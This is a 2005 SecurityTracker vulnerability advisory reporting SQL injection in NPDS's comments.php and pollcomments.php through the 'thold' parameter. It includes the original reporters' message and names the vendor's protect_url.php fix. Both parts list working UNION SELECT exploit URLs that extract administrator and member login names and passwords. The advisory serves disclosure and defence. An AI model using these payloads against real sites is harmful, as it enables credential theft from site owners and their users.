Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
|
|
|
|
|
|
|
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
|
|
|
|
Become a Partner and License Our Database or Notification Service
|
|
|
|
|
|
|
|
|
|
|
|
|
|
NPDS Input Validation Holes in 'comments.php' and 'pollcomments.php' Permit SQL Injection
|
|
SecurityTracker Alert ID: 1013973
|
|
SecurityTracker URL: http://securitytracker.com/id?1013973
|
|
CVE Reference: GENERIC-MAP-NOMATCH
(Links to External Site)
|
Date: May 16 2005
|
Impact: Disclosure of system information, Disclosure of user information, User access via network
|
Fix Available: Yes
Exploit Included: Yes
Vendor Confirmed: Yes
|
Description: Romano, Benjilenoob, and NoSP reported several input validation vulnerabilities in NPDS. A remote user can inject SQL commands.
The 'comments.php' and 'pollcomments.php' scripts do not properly validate user-supplied input in the 'thold' parameter. A remote
user can supply specially crafted parameter values to execute SQL commands on the underlying database.
Some demonstration exploit
URLs are provided:
http://[target]/npds/comments.php?thold=0%20UNION%20SELECT%200,0,0,0,0,0,0,0,aid,pwd,0,0%20FROM%20authors
http://[target]/npds/comments.php?thold
=0%20UNION%20SELECT%200,0,0,0,0,0,0,0,uname,pass,0,0%20FROM%20users
http://[target]/npds/pollcomments.php?thold=0%20UNION%20SELECT%200,0,0,0,0,0,0,0,aid,pwd,0,0%20FROM
%20authors
http://[target]/npds/pollcomments.php?op=results&pollID=2&mode=&order=&thold=0%20UNION%20SELECT%200,0,0,0,0,0,0,0,uname,pass,0,0%20FROM%20u
|
Impact: A remote user can execute SQL commands on the underlying database.
|
Solution: The vendor has issued a fix (using the new 'protect_url.php' file), described at:
http://www.npds.org/article.php?sid=1254&thold=0
|
Vendor URL: www.npds.org/ (Links to External Site)
|
Cause: Input validation error
|
Underlying OS: Linux (Any), UNIX (Any), Windows (Any)
|
Reported By: NoSP <NoSP@thehackademy.net>
|
Message History:
None.
|
Source Message Contents
|
Date: Sun, 15 May 2005 19:35:08 +0200
From: NoSP <NoSP@thehackademy.net>
Subject: SQL injection in NPDS
|
Category: Application (Multimedia) > CMS-NPDS
Vendors: www.npds.org
Title : Inject SQL command in pollcomments.php & comments.php
Date: May 15 2005
Impact: Disclosure of authentication information, Disclosure of user
information, ...
Fix Available: Yes
Solution : use protect_url.php (see www.npds.org for more details)
Description : Romano, Benjilenoob and NoSP reported several vulnerabilities in
NPDS. A remote user can inject SQL commands in $thold variable from
comments.php or pollcomments.php.
The scripts does not properly filter user-supplied $thold variable.
Some demonstration exploit URLs are provided:
Disclosure login/pass admin
http://localhost/npds/comments.php?thold=0%20UNION%20SELECT%200,0,0,0,0,0,0,0,aid,pwd,0,0%20FROM%20au
thors
Diclosure login/pass members
http://localhost/npds/comments.php?thold=0%20UNION%20SELECT%200,0,0,0,0,0,0,0,uname,pass,0,0%20FROM%2
0users
Disclosure login/pass admin
http://localhost/npds/pollcomments.php?thold=0%20UNION%20SELECT%200,0,0,0,0,0,0,0,aid,pwd,0,0%20FROM%
20authors
Diclosure login/pass members
http://localhost/npds/pollcomments.php?op=results&pollID=2&mode=&order=&thold=0%20UNI
ON%20SELECT%200,0,0,0,0,0,0,0,uname,pass,0,0%20FROM%20users
Reported By: "Romano" <romano_45 AT hotmail_DOT_com, "NoSP" <NoSP AT
thehackademy DOT net> "Benjilenoob" <benjilenoob AT hotmail DOT com>
|
|
Go to the Top of This SecurityTracker Archive Page
|
